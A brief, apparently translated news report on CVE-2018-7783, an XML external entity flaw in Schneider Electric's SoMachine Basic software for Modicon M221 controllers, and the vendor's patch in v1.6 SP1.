Schneider PLC exposes high-risk vulnerability allowing hackers to initiate remote attacks

Schneider Electric, a global leader in energy efficiency management, issued a fix last Tuesday against a high-risk vulnerability in SoMachine Basic’s programming software that could be remotely exploited to obtain sensitive data.

SoMachine Basic, also known as EcoStruxure Machine Expert, is a lightweight programming software designed specifically for the Schneider Modicon M221 Programmable Logic Controller (PLC) for the development of PLC program code.

Gjoko Krstic, a researcher at Applied Risk, an industrial network security company, recently discovered SoMachine Basic 1.6.0 build 61653 and SoMachine Basic 1.5.5 SP1 build 60148, and it is highly likely that all earlier versions were subject to an XML External Injection (XXE) vulnerability. Affected, this vulnerability can be exploited to initiate out of band (OOB) attacks.

This vulnerability is tracked as CVE-2018-7783, CVSS V3 score 8.6, which is a high-risk vulnerability. This vulnerability can be exploited by unauthenticated remote attackers to read arbitrary files on the target system, and these files may contain sensitive information such as passwords, user data, and details about the system.

Krstic pointed out that in order to exploit this loophole, an attacker must trick the victim into opening a specially crafted SoMachine Basic project or template file. In addition, under certain circumstances, this vulnerability may also be exploited to execute arbitrary code and cause the target system to enter a denial of service (DoS) state.

Schneider Electric has now fixed this vulnerability by releasing SoMachine Basic v1.6 SP1 and recommends that users download patches as soon as possible or use the Schneider Electric software update tool to update them.